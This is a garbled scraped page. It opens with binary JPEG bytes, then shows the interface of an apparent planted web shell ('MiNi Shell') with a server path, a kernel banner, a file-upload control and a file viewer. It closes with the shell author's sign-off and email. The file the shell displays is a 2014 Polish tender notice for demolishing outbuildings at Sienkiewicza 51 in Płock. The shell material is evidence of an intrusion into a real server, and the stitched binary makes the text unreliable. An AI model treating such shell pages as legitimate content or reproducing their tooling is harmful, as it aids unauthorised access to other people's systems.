JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140627/138611-N-2014.html

<p class="kh_header"><b>Płock: Rozbiórka budynku mieszkalnego - oficyna lewa i prawa zlokalizowanego w Płocku przy ulicy Sienkiewicza 51</b><br>
<b>Numer ogłoszenia: 138611 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. , ul. Polna 7, 09-400 Płock, woj. mazowieckie, tel. 24 3640310, faks 24 3640311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzgm-plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością ze 100% Udziałem Gminy Miasto Płock.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbiórka budynku mieszkalnego - oficyna lewa i prawa zlokalizowanego w Płocku przy ulicy Sienkiewicza 51.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiot zamówienia

Przedmiotem zamówienia są prace rozbiórkowe oficyny lewej i prawej budynku mieszkalnego zlokalizowanego w Płocku przy ul. Sienkiewicza 51 zgodnie z opracowanym projektem budowlanym. Część frontowa budynku pozostaje bez zmian co do sposobu użytkowania. Budynek jest wpisany do rejestru ewidencji zabytków i podlega z tego tytułu ochronie konserwatorskiej.
 
II. Opis stanu istniejącego

Ogólna charakterystyka obiektu
Oficyna lewa
Budynek lewej oficyny to budynek dwukondygnacyjny z poddaszem nieużytkowym, niepodpiwniczony, wykonany w technologii tradycyjnej - murowanej. Budynek w przeszłości pełnił funkcję budynku mieszkalnego, obecnie w stanie zdewastowanym. Ściany zewnętrzne murowane z cegły ceramicznej pełnej o gr. ok 43 cm. Nadproża nad otworami okiennymi i drzwiowymi w ścianach nośnych, ceglane. Stropy drewniane na belkach stropowych drewnianych. Dach jednospadowy o kącie nachylenia ok. 30o i konstrukcji drewnianej krokwiowo-płatwiowej. Pokrycie dachu stanowi papa asfaltowa na deskowaniu pełnym. 
Wielkości charakterystyczne obiektu
szerokość: 			      6,00 m
długość			                 23,35 m
wysokość w okapie		      4,15 m
wysokość w kalenicy	                   9,93 m
powierzchnia zabudowy	  140,10 m2
powierzchnia użytkowa	               213,00 m2
kubatura			1143,00 m3
Oficyna prawa
Budynek prawej oficyny to budynek dwukondygnacyjny (w tej części z nieużytkowym poddaszem), częściowo trzykondygnacyjny, częściowo podpiwniczony, wykonany w technologii tradycyjnej - murowanej. Część budynku trzykondygnacyjna to część zlokalizowana bezpośrednio przy budynku frontowym. Budynek w przeszłości pełnił funkcję budynku mieszkalnego, obecnie w stanie zdewastowanym. Ściany zewnętrzne murowane z cegły ceramicznej pełnej o gr. ok 33-36 cm. Nadproża nad otworami okiennymi i drzwiowymi w ścianach nośnych, ceglane. Stropy drewniane na belkach stropowych drewnianych. Dach jednospadowy o kącie nachylenia ok. 25o nad częścią dwukondygnacyjną i ok. 15o nad częścią trzykondygnacyjną.  Konstrukcja dachu drewniana krokwiowo-płatwiowa.  Pokrycie dachu stanowi papa asfaltowa na deskowaniu pełnym. 
Wielkości charakterystyczne obiektu
szerokość: 		     3,64 - 4,83 m
długość			    	  27,61 m
wysokość w okapie	    5,78 - 10,47 m
wysokość w kalenicy         8,28 - 11,66 m
powierzchnia zabudowy	167,20 m2
powierzchnia użytkowa	                  194 m2
kubatura		            1075,00 m3 
III. Opis prac rozbiórkowych
W ramach realizacji przedmiotu zamówienia przewidziano wykonanie następujących prac:
zabezpieczenie terenu
demontaż pozostałości po urządzeniach wodociągowo-kanalizacyjnych, elektrycznych itp. Przed przystąpieniem do demontażu konieczne jest potwierdzenie faktu odłączenia tych instalacji od zewnętrznych sieci zasilających
demontaż pozostałości okien, drzwi, ościeżnic okiennych i drzwiowych. Przed przystąpieniem do do prac sprawdzić czy ościeżnice nie spełniają roli podpory dla danej części ściany,
rozbiórka wewnątrz budynku; demontaż drzwi wraz z ościeżnicami, rozbiórka ścianek działowych kondygnacji nadziemnych - rozbiórka warstwami bez zwalania na stropy
rozbiórka poszycia dachu, więźby dachowej, obróbek blacharskich, rynien i rur spustowych
rozbiórka stropów od góry
rozbiórka ścian po rozebraniu stropu kondygnacji wyższej
rozbiórka ścian znajdujących się w bezpośrednim sąsiedztwie granic działki oraz ścian prostopadłych do tychże z zachowaniem wytycznych zawartych w projekcie budowlanym
rozbiórka ścian fundamentowych do poziomu -30 cm poniżej poziomu terenu
zamurowanie otworów pozostałych w części frontowej budynku 
utylizacja gruzu
utylizacja pozostałych elementów
oczyszczenie i niwelacja terenu
wykonanie inwentaryzacji geodezyjnej powykonawczej   
IV. Wymagania dotyczące wykonania i odbioru robót
Wszystkie prace należy wykonać zgodnie z zasadami sztuki budowlanej oraz przepisami bhp. Pracownicy wykonujący prace na rusztowaniach muszą posiadać aktualne zaświadczenia lekarskie dopuszczające do prac na wysokości.
Na czas rozbiórki wygrodzić strefę niebezpieczną oraz oznakować w taki sposób, aby uniemożliwić dostęp osobom postronnym
ustawić znaki ostrzegawcze
wyznaczyć strefy gromadzenia materiałów z demontażu
teren rozbiórki wyposażyć w niezbędny sprzęt ppoż
nie prowadzić prac rozbiórkowych podczas opadów deszczu, śniegu występowania silnego wiatru a także w warunkach ograniczonej widoczności
zabezpieczyć przed zniszczeniem wszelkie znajdujące się w pobliżu urządzenia, budynki, drzewa
rozbiórkę ścian znajdujących się w bezpośrednim sąsiedztwie granic działki oraz ścian prostopadłych do tychże na odcinku ok. 1 m należy prowadzić bez użycia narzędzi wywołujących drgania z zachowaniem szczególnej ostrożności
  
V. Warunki kontroli i odbioru wyrobów oraz robót budowlanych.
Inwestor nie odbierze robót o niezgodnym z wymaganiami specyfikacji standardzie lub wykonanych z nieusuwalnymi usterkami, na zasadzie obniżenia wartości wykonanych prac.
Podczas przeprowadzenia odbioru sprawdzeniu podlegać będzie dokumentacja odbiorowa oraz jakość wykonania prac.
Podpisanie przez przedstawicieli inwestora protokołu odbioru robót nie zwalnia wykonawcy z obowiązku usunięcia wad ukrytych lub nieujawnionych podczas odbioru występujących w przedmiocie umowy.
VI. UWAGI KOŃCOWE
Powyższy opis techniczny i wytyczne dotyczące realizacji obejmują najważniejsze elementy budowlane wykonywanego obiektu. Wykonawstwo robót remontowych realizowane być musi zgodnie z obowiązującymi przepisami prawa budowlanego oraz BHP, przy czym stosować się należy do wszystkich uznanych reguł sztuki budowlanej, a całość realizacji odpowiadać musi najnowszemu poziomowi techniki budowlanej.

Szczegółowy zakres robót określają załączniki do SIWZ stanowiące integralną część opisu przedmiotu zamówienia: Załącznik Nr 6 - Projekt budowlany, Załącznik Nr 7 -  Przedmiar robót   - oficyna prawa, Załącznik Nr 8 -  Przedmiar robót - oficyna lewa, Załącznik Nr 9 - Specyfikacja techniczna wykonania i odbioru robót budowlanych.
    Wykonawca udzieli minimum 12 miesięcznej gwarancji na wykonane prace..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca Przystępując do  przetargu jest zobowiązany wnieść wadium w wysokości 3.000,00  zł (słownie: trzy tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia w trybie art. 44 w związku z art. 22 ust.1 Pzp. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia) na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał w ciągu ostatnich pięciu lat (przed upływem terminu składania ofert ), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwie  roboty budowlane  w zakresie rozbiórki budynków oraz o  wartości co najmniej 70.000, 00 zł brutto łącznie.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia) na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia w trybie art. 44 w związku z art. 22 ust.1 Pzp. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia) na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jednym kierownikiem robót posiadającym uprawnienia budowlane i wpisanym na listę członków Okręgowej Izby Inżynierów Budownictwa oraz posiadającym uprawnienia do wykonywania robót przy zabytkach  i w strefie ochrony konserwatorskiej.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia) na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż cena oferty.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia) na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-   Kopia uprawnień budowlanych kierownika robót wraz z uprawnieniami do prowadzenia prac przy obiektach zabytkowych lub Kopia uprawnień budowlanych kierownika robót wraz z listem referencyjnym wydanym przez urząd ochrony zabytków.
- Kopia aktualnego zaświadczenia o członkostwie w Okręgowej Izbie Inżynierów Budownictwa   kierownika robót.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:
1.	Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:
1) osób i danych określonych w §5, §6 Umowy
2)terminu realizacji przedmiotu umowy ze względu na:
a)zaistnienie działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, z wyjątkiem tych, które mogą być spowodowane użyciem ich przez wykonawcę,
b) zaistnienie klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki,
             c)wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających wykonanie robót.
na warunkach określonych w § 13 ust. 1 umowy.
Stosowny aneks do umowy zostanie podpisany przez strony najpóźniej na 7 dni przed wejściem ich w życie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzgm-plock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. ul. Polna 7, 09-400 Płock p.32 w godz. 7:30-15:30 po uiszczeniu opłaty za jej wydanie w kwocie 35,05 zł brutto..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2014 godzina 09:30, miejsce: Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. ul. Polna 7, 09-400 Płock, Kancelaria pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com